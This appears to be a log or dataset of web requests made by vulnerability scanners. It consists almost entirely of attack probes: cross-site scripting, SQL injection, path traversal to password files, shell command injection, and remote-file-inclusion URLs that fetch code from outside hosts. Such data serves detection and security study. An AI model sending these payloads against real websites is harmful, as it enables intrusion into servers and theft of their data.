src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/ion-p.exe?page=../../../../../etc/passwd\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1331923205,4--&blog=1\n/javascript/psql.exe\n/miz4r5hz.cgi?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/bmeun223.asp?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/uc3w3bdi.x?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/jdx255ea.aspx?<script>document.cookie=\"testziyq=5055;\"</script>\n/odzk29aa.aspx?<script>document.cookie=\"testtfvh=2141;\"</script>\n/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd\\x00\n/cgi-exe/cgi-test.exe\n/manager/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/l13b77e5.fts?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n<script>document.cookie=\"testbfpq=3326;\"</script>\n/9kr0ih0v.exe?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/lsoix5h3.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/pay.exe\n/r3le3om5.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"del,q35488415&rem,\n/script/ident/disconnect.php?path_inc=http://cirt.net/rfiinc.txt?\n/egaet53a.html?<script>cross_site_scripting.nasl</script>\n/ydexw8by.idc?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/bzuf9ozq.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=';del q14794373 #\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/ipb5ri?\\x00\n/g3w7y7u5.dll?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/main.php?logout=\"&del\\x09q14643294&rem\\x09\n/lsoix5h3.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/data/fetch.php?page='\n/cgi/.htpasswd\n/other_scripts/\n/warnock's_dilemma/\n/bl8sefdm.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/htimage.exe/path/filename?2,2\n/jw64yq8u.kspx?<script>document.cookie=\"testylfu=1313;\"</script>\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd\n/profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\n/main.php?logout=\"&ver;>q41289753&rem;\n/cgi.cgi/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/07_bush-scripted/\n/recordings/index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd\n/help.php?q='\n/<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/rrqfvzowbk0+>+/dev/null+&').\"]=1\n/phpmyadmin/search.jsp?q=%\"<script>alert(1332008604)</script>\n/main.php?stuff=\"&ver >q95559964&rem \n/examples/jsp/num/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/examples/jsp/num/print.php?what=article&id='\n/examples/jsp/jsp2/el/top.php?header=../../../../../../../../etc/passwd\n/en-us/accountsearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/v3axg1p8.cgi?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/qhvu0pdg.jsp?<script>document.cookie=\"testchuc=2100;\"</script>\n/ny1b3qq4.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/search=<script>alert('xss')</script>\n/javascript/.htpasswd.sfish/\\'\\\"\n/main.php?stuff=';rm q36774183 #\n/javascript/mms.exe\n/s7qus4g3.php3?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&del,q22827927&rem,\n/scripts/weigh_keywords.php?etcdir=http://192.168.202.118:8080/ghl9il?\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/examples/jsp/num/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/ghl9il?\n/cgi-bin/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/en-us/hipkz026.pl?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/examples/jsp/colors/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/main.php?logout=\"\\x0adel\\x09q94356566\\x09#\n/cacti/snpfiltered.pl?t=c&u=<script>foo</script>\n/top.php?stuff=\"|ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/bmeun223.mscgi?<script>document.cookie=\"testhhwu=7044;\"</script>\n/de3v2dd9.idc?<script>cross_site_scripting.nasl</script>\n/9ko6m4c8.idc?<script>document.cookie=\"testylik=3403;\"</script>\n/main.php?stuff=;uname >q23784271 #\n/examples/jsp/colors/zpanel.php?page=/etc/passwd\\x00\n/examples/jsp/num/sendcard.php?view=1&id='sendcard_sql.nasl\n/javascript/.htaccess/'`true`'\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904227,0x3a,1244506787),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/7uz3ok60.php3?<script>cross_site_scripting.nasl</script>\n/odzk29aa.html?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/tukodz3j.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/uc3w3bdi.cgi?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/g8nu2yy7.x?<script>cross_site_scripting.nasl</script>\n/en-us/account/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/fo564rei.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/jnv890lt.kspx?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=&ver\\x0c>q32278884&rem\\x0c\n/byrg33fw.php3?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/h5sc3gxy.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/byrg33fw.html?<script>document.cookie=\"testexuu=5340;\"</script>\n/a0imiuf1.dll?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\\x00\n/help.php?q=\"del\\x09q26563628\\x09#\n/examples/jsp/cal/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/manager/language.php?data_dir=/etc/passwd\\x00\n/examples/jsp/sessions/catalog.php?action=category_show&id='\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1332010393\n/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini\n/t7tm4m0b.htm?<script>cross_site_scripting.nasl</script>\n/main.php?logout='\\x0drm\\x09q37443231\\x09#\n/examples/jsp/colors/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/cal/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/main.php?stuff=;rm q28712723 #\n/606wkcop.fts?<script>cross_site_scripting.nasl</script>\n/scripts/tomcat_proxy_directory_traversal.nasl1331923204\n/help.php?q=\"|ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/scripts/fake.cgi?arg=/dir/../../../../../../../../../../../winnt/win.ini\n/6qbynt4f.x?<script>cross_site_scripting.nasl</script>\n/1r8cfrlf.dll?<script>document.cookie=\"testydan=5106;\"</script>\n/t7tm4m0b.mscgi?<script>cross_site_scripting.nasl</script>\n/scripts/help/copyright.html\n/top.php?stuff='\\x0auname >q94927894 #\n/cacti/man-cgi?section=0&topic=ls;id\n/uc3w3bdi.cgi?<script>document.cookie=\"testxllt=9940;\"</script>\n/de3v2dd9.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/games.exe\n/scripts/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://cirt.net/rfiinc.txt?'\n/examples/jsp/colors/misc/audio.php?recording=../version.inc\n/gy23xnjq.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptions.cs\n/cabela's/\n/examples/jsp/cal/forumdisplay.php?fid=21\"><script>x</script>\n/0z575z74.nsf?<script>document.cookie=\"testuhsv=9753;\"</script>\n/h5sc3gxy.htm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/direct.php?rf=/etc/passwd\\x00\n/eg2u8pbv.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/scripts/index.cgi\n/o1zj4u9v.jspa?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/auth_passwd/\n/examples/jsp/error/rot13sj.cgi?/etc/passwd\n/en-us/account/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/examples/jsp/num/search.jsp?q=%\"<script>alert(1331904373)</script>\n/manager/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/javascript/media.exe\n/top.php?stuff='rm q33698181 #\n/cgi-exe/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/en-us/manager/search/data/inputs/script/_new?action=edit&ns=search\n/shopcustadmin.asp?msg=<script>alert(414376083575)</script>\n/acart2_0/admin/error.asp?msg=<script>alert(\\\"test\\\")</script>\n/help.php?q=\"ping -w 9000 -n 1 1.2.3.4|rem \n/main.php?stuff=\"|ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/scripts/weigh_keywords.php?etcdir=@rfiurl\n/examples/jsp/jsp2/jspx/admin/admin.php?sid=0'\n/examples/jsp/colors/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/o1zj4u9v.do?<script>document.cookie=\"testabrn=6368;\"</script>\n/3j8echh0.html?<script>document.cookie=\"testfuqi=4189;\"</script>\n//../../../../../../../../../windows/win.ini\n/manager/config.php?path[docroot]=/etc/passwd\\x00\n/examples/jsp/cal/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/examples/jsp/num/starnet/addons/slideshow_full.php?album_name='581236276\n/phpmyadmin/documentation.html?phpmyadmin=|cat /etc/passwd#\n/main.php?logout=\"sleep 11 #\n/invision scripts collection/\n/en-us/<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/scripts/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/recordings/index.php?configfile=../../../../../../../../../etc/passwd\n/nmw0do67.cfc?<script>cross_site_scripting.nasl</script>\n/vjbrrppi.idc?<script>cross_site_scripting.nasl</script>\n/godwin's_law/\n/o1zj4u9v.php?<script>document.cookie=\"testabrn=6368;\"</script>\n/recordings/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/examples/jsp/sessions/sendcard.php?view=1&id='sendcard_sql.nasl\n/d765w06j.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ygkjkngd.asp?<script>document.cookie=\"testnago=4518;\"</script>\n/top.php?stuff=\"ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/scripting_small/\n/scripts/lce0cbkfb8xx.cgi\n/cacti/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --\n/examples/jsp/num/secure.php?cfgprogdir=/etc/passwd\\x00\n/pastescript-0/\n/examples/jsp/num/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/known_hosts.exe\n/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=&ver,>q26592279&rem,\n/examples/jsp/error/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/interface/login/login_frame.php?site=paros\" style=\"background:url(javascript:alert('owasp zap'))\n/x2gyorli.cfm?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/scripts_signupsetup/\n/scripts/calendar.php?month=' union select 1,1,'1331918956','calendarix_month_sql_injection.nasl',1 #\n/help.php?q=\"ping -w 7000 -n 1 4.3.2.1&rem \n/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/corqrbaqpr.sh+>+/dev/null+&').\"]=1\n/examples/jsp/colors/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/eden's_crush/\n/d44uk9h2.cfc?<script>document.cookie=\"testmybc=2088;\"</script>\n/t7tm4m0b.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/scripts/search.jsp?q=%\"<script>alert(1331908697)</script>\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/txenjrxf3?\n/help.php?q=ver >q22899794&rem \n/phpmyadmin/config.php?path[docroot]=/etc/passwd\\x00\n/en-us/n9xlumt5.aspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/starnet/addons/slideshow_full.php?album_name='1554634339\n/examples/jsp/error/index.php?page=/etc/passwd\\x00\n/examples/jsp/num/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/cacti/styles.php?toroot=/etc/passwd\\x00\n/javascript/cal.exe\n/scripts/qg9h0c0svvat.inc\n/javascript/frontend.exe\n/help.php?q=\"&rm\\x09q13543643\\x09#\n/unscripted/\n/j4oqyvga.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/main.php?logout='rm q44999749 #\n/en-us/account/index.php?site=../../../../../../../../etc/passwd\\x00\n/javascript/htpasswd.fcgi\n/d7ktpmcq.dll?<script>cross_site_scripting.nasl</script>\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.exe\n/activedirectoryremoteadminscripts/\n/webdav/phprun.php?cmd=c:\\wce.exe -h\n/cgi-bin/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/0rufe52p.pl?<script>cross_site_scripting.nasl</script>\n/javascript/garbage.exe\n/scripts/ylrvly9nh_pf.php\n/en-us/ddoworrl.php?<script>document.cookie=\"testvlau=8517;\"</script>\n//</p><body><script/src=\"http://www.example.com/test?rnd=q93113777\"></script><p>\n/javascript/txt.exe\n/.nsf/../winnt/win.ini\n/edzaia0i.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"ping,-w,8000,-n,1,1.2.3.4|rem,\n/r3le3om5.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/member/index.php\n/r3le3om5.idc?<script>cross_site_scripting.nasl</script>\n/cacti/index.php?post=../config/password\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331919216\")</script>\n/help.php?q=\"uname\\x09>q96611289\\x09#\n/logon.asp?error=<script>alert(\"410626083381\");</script>\n/calltranscript/\n/m5103snj.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zul'farrak/\n/raanw4ia.exe?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=';sleep 10 #\n/scripts/scoadminreg.cgi\n/iv5vkgam.x?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/passwdqc-0/\n/examples/jsp/jsp2/jspx/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/j4drbkil.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&ver\\x0c>q17127645&rem\\x0c\n/destiny's_child/\n/yver8r9o.cfm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&rm\\x0cq33739327&rem\\x0c\n/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/main.php?stuff='\\x0auname >q61656815 #\n/bl8sefdm.x?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1\n/?<script>document.cookie=\"testmjct=1867;\"</script>\n/manager/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/7o5qp766.asp?<script>cross_site_scripting.nasl</script>\n/vhzmaia2.idc?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/<script>cross_site_scripting.nasl</script>.cfm\n/en-us/esmozg5d.do?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"ping,-w,10000,-n,1,1.2.3.4&rem,\n/javascript/htpasswd.swf\n/quagynka.php3?<script>cross_site_scripting.nasl</script>\n/bxnyrhmh.idc?<script>document.cookie=\"testmjct=1867;\"</script>\n/javascript/chats.exe\n/0z575z74.fts?<script>document.cookie=\"testuhsv=9753;\"</script>\n/jack's teen america/\n/main.php?logout=;uname\\x09>q38215685\\x09#\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --\n/fo564rei.cfc?<script>cross_site_scripting.nasl</script>\n/recordings/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/main.php?stuff=\"&del\\xa0q39243847&rem\\xa0\n/htbin/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/scripts/bveygnpo6hkw.sh\n/examples/jsp/sessions/newsdesk.cgi?t=../../../../../../etc/passwd\n/h4bi26jd.html?<script>document.cookie=\"testhrzx=1150;\"</script>\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008322&lang_crm=../../vtigerservice.php\\x00\n/scripts-head/\n/en-us/oie504mr.cfc?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/n9xlumt5.do?<script>cross_site_scripting.nasl</script>\n/mv8wxfy9.kspx?<script>document.cookie=\"testrhbc=8184;\"</script>\n/cgi-home/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/notify?from=nessus\"|id\"\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/main.php?stuff=\"&ping -w 10000 -n 1 1.2.3.4&rem \n/quagynka.nsf?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=|ping;-w;9000;-n;1;4.3.2.1|rem;\n/examples/jsp/cal/sendcard.php?view=1&id='sendcard_sql.nasl\n/miz4r5hz.jsp?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/examples/jsp/cal/search/show.pl?url=file:/etc/passwd\n/ydexw8by.htm?<script>document.cookie=\"testulex=4996;\"</script>\n/cacti/admin/top.php?admindir=/etc/passwd\\x00\n/5qnlm5z2.pl?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/examples/jsp/jsp2/jspx/myevent.php?myevent_path=/etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+esbql.com>olnbd+||+echo+\n/javascript/iframe.exe\n/cacti/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/gvx7m5ti.x?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/zuihld5m.nsf?<script>cross_site_scripting.nasl</script>\n/main.php?stuff='\\x0arm q75819271 #\n/scripts/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/examples/jsp/sessions/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/taux marginal de l'impot sur le revenue/\n/scripts/gallery.scr.php?globals[pth][func]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/main.php?stuff=\"&ping\\x09-w\\x098000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/main.php?stuff=\\x0duname\\x09>q73354592\\x09#\n/recordings/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/russell's_teapot/\n/cgi-bin/topic.php?tid='select\n/main.php?logout=\"&ver\\x0b>q41987339&rem\\x0b\n/help.php?q=&uname >q96999374 #\n/o35zot2r.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vmi8bb12.nsf?<script>document.cookie=\"testlerc=2575;\"</script>\n/cacti/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/main.php?frm_daynight=q45634966&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php&frm_user=&scr_height=&scr_width=\n/modules.php?op=modload&name=members_list&file=index&letter=<script>alert('vulnerable')</script>\n/main.php?stuff=\"ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/d44uk9h2.idc?<script>document.cookie=\"testmybc=2088;\"</script>\n/help.php?q=\"&ping;-w;11000;-n;1;1.2.3.4&rem;\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 145671700--\n/javascript/thumbs.exe\n/h5i6crm3.do?<script>document.cookie=\"testlihk=7070;\"</script>\n/scripts/c0kha6w3apd3.html\n/hipkz026.htm?<script>document.cookie=\"testyrbs=2855;\"</script>\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332010400','5'--\n/mv8wxfy9.mscgi?<script>document.cookie=\"testrhbc=8184;\"</script>\n/examples/jsp/error/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n//.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc/passwd\n/odzk29aa.php?<script>document.cookie=\"testtfvh=2141;\"</script>\n/help.php?q=\"del;q28828634&rem;\n/script/ident/loginliste.php?path_inc=http://cirt.net/rfiinc.txt?\n/main.php?logout=\"&del,q91889862&rem,\n/javascript/vpn.exe\n/b5xdqgz2.cfm?<script>cross_site_scripting.nasl</script>\n/webcgi/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/1qwv2p5p.asp?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/xlj7h65o.php3?<script>document.cookie=\"testtbbe=856;\"</script>\n/signup.php?referral=\"><script>alert(\"414276083571\");</script>\n/main.php?stuff=\"rm\\x09q51339959\\x09#\n/htbin/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/scripts/site_info.asp\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd\n/scripts/nryr3lvrjnwx.html\n/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null\n/psynch/nph-psa.exe?css=http://192.168.202.118:8080/zz5thkvtmlgl?\n/top.php?stuff=\"&ping,-w,9000,-n,1,4.3.2.1&rem,\n/scripts/irbf6nj7oyfh.php\n/dda2qr7j.aspx?<script>cross_site_scripting.nasl</script>\n/javascript/dan.exe\n/description_on/\n/javascript/banks.exe\n/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/phpmyadmin/admin/configset.php?settings_dir=/etc/passwd\\x00\n/cacti/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/examples/jsp/colors/admin/configset.php?settings_dir=/etc/passwd\\x00\n/bmeun223.php3?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/main.php?stuff=\"del,q33358897&rem,\n/main.php?logout=\"&del;q32916572&rem;\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>','0');waitfor delay '0:0:15';--\n/t578vqea.dll?<script>document.cookie=\"testsory=7676;\"</script>\n/towels-0.1/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/zz5thkvtmlgl?\n/examples/jsp/error/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/viewcvs.cgi/?cvsroot=<script>foo</script>\n/cgi-bin/shop.cgi?page=../../../../../../../etc/passwd\n/manager/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/javascript/hec.exe\nftp://192.168.22.253/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/phpmyadmin/popup.php?include_path=/etc/passwd\\x00\n/top.php?stuff=\"rm,q37582953&rem,\n/examples/servlets/servlet/index.php?id=0rop9yeuxw'\n/mpcgi/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/en-us/account/js/scripts.php?load=/etc/passwd\\x00\n<script>document.cookie=\"testqpux=4016;\"</script>\n/openemr/interface/login/validateuser.php?u=test'\n/b5xdqgz2.mscgi?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"del q69198385 #\n/top.php?stuff='rm q36497765 #\n/examples/servlets/servlet/index.php?template=../../../loudblog/custom/config.php\\x00\n/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/top.php?stuff=\"ping;-w;7000;-n;1;4.3.2.1|rem;\n/cgi-bin/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=\"&ping,-w,7000,-n,1,1.2.3.4&rem,\n/javascript/core.exe\n/ao22ww7y.cgi?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/star wars revenge of the sith script/\n/main.php?logout=\"|sleep\\x0911\\x09#\n/scripts/webplus.exe?script=webplus_install_path.nasl\n/javascript/~ashley.exe\n/azcrfs8d.cfc?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/examples/jsp/checkbox/calendar.php?serverpath=/etc/passwd\\x00\n/zqqemp6j.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/kanye west - late registration 'advance 2005'/\n/esmozg5d.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/g8nu2yy7.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/examples/jsp/error/webdist.cgi?distloc=;id\n/ju0u7kfo.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1290993919,0,0,0,0,0--\n/scripts/add_user.php\n/zmvq66jy.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/shopper.cgi?newpage=../../../../../../etc/passwd\n/htbin/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/recordings/viewpage.php?file=/etc/passwd\n/j4drbkil.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nmw0do67.jspa?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/help.php?q='\\x0asleep 11 #\n/zroo33l4.aspx?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/user.php?op=userinfo&uname=<script>alert('hi');</script>\n/cgi-bin/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/xlj7h65o.cfm?<script>document.cookie=\"testtbbe=856;\"</script>\n/scriptreorganizer/\n/i7prbs22.php3?<script>document.cookie=\"testjnre=7328;\"</script>\n/yef5f3d5.idc?<script>document.cookie=\"testcrcv=6167;\"</script>\n/scripting/\n/scripts/docbuilder/top.php\n/manager/profil.php?id=1 <script>foo</script>\n/examples/jsp/jsp2/el/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/recordings/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/<script>document.cookie=\"testsory=7676;\"</script>\n/cgi-915/texis.exe/junk\n/examples/jsp/jsp2/el/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/cgi-bin/index.php?id='union/**/select/**/0,0,211288531,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/help.php?q=\"rm\\x0cq88163734&rem\\x0c\n/6n7aacgg.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/txenjrxf3?\n/examples/jsp/sessions/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/top.php?stuff=\"|ping,-w,7000,-n,1,1.2.3.4|rem,\n/recordings/view_user.php?list=1&letter=&sort_by='select\n/modif_infos.asp?n=/etc/passwd\n/examples/servlets/servlet/search.jsp?q=%\"<script>alert(1331904373)</script>\n/examples/jsp/jsp2/el/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/vjbrrppi.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nmw0do67.html?<script>cross_site_scripting.nasl</script>\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331908736\")</script>\n/i7prbs22.aspx?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/7u1pb2xi.php3?<meta http-equiv=set-cookie 